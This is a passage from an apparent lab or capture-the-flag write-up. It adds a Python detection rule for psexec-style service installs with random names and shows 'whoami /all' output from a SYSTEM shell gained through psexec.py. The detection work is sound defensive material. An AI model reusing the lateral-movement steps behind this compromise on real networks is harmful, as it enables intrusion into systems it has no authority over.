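psexec.py above uploads a binary with a random 8-letter name to ADMIN$ (KitMylyT.exe) and registers a service with a random 4-letter name (HaQq), both visible in the output. As an added example, not part of this writeup, the following is a detection rule over service-install records that flags exactly that shape. The record type and the sample records are constructed for the example; that a file dropped in ADMIN$ shows up as %systemroot%\<name>.exe in the service's image path is an assumption here, since the page does not show the registered path.

```python
import re
from dataclasses import dataclass


@dataclass
class ServiceInstall:
    """Minimal view of a 'service installed' record (the kind the System log
    keeps as event 7045). Field names are this example's own, not a real schema."""
    host: str
    service_name: str
    image_path: str
    account: str


# Constructed sample records. The first mirrors the names psexec.py printed above;
# the others are benign or come from a different tool and must not match.
SAMPLE_EVENTS = [
    ServiceInstall("dc01", "HaQq", r"%systemroot%\KitMylyT.exe", "LocalSystem"),
    ServiceInstall("dc01", "WinDefend", r"C:\Program Files\Windows Defender\MsMpEng.exe", "LocalSystem"),
    ServiceInstall("dc01", "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe", "LocalSystem"),
    ServiceInstall("mgmt", "Spooler", r"C:\Windows\System32\spoolsv.exe", "LocalSystem"),
]

# Exactly four ASCII letters: the service-name shape seen above.
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
# Exactly eight ASCII letters plus .exe directly under the Windows directory,
# which is where ADMIN$ maps (assumed path form, see lead-in).
RANDOM_BINARY_IN_ADMIN_SHARE = re.compile(
    r"^(?:%systemroot%|c:\\windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE
)


def is_psexec_style(ev: ServiceInstall) -> bool:
    """Both conditions must hold; either alone is too common to alert on."""
    return bool(RANDOM_SERVICE_NAME.match(ev.service_name)) and bool(
        RANDOM_BINARY_IN_ADMIN_SHARE.match(ev.image_path)
    )


def flag_service_installs(events):
    """Return (host, service_name, image_path) for each record matching the pattern."""
    return [(e.host, e.service_name, e.image_path) for e in events if is_psexec_style(e)]


if __name__ == "__main__":
    for hit in flag_service_installs(SAMPLE_EVENTS):
        print("suspicious service install:", hit)
```

Note that the Sysinternals PSEXESVC record is deliberately not matched: its binary happens to be eight letters, but the service name is fixed, so it needs its own rule. Pairing this with the file-write to ADMIN$ on the same host shortly before the service start tightens the rule further.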
Read whoami /all¶
C:\Windows\system32> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
ERROR: Unable to get user claims information.
C:\Windows\system32>
Lessons Learned¶
Tags¶
References¶
https://github.com/nicocha30/ligolo-ng/releases/tag/v0.8.2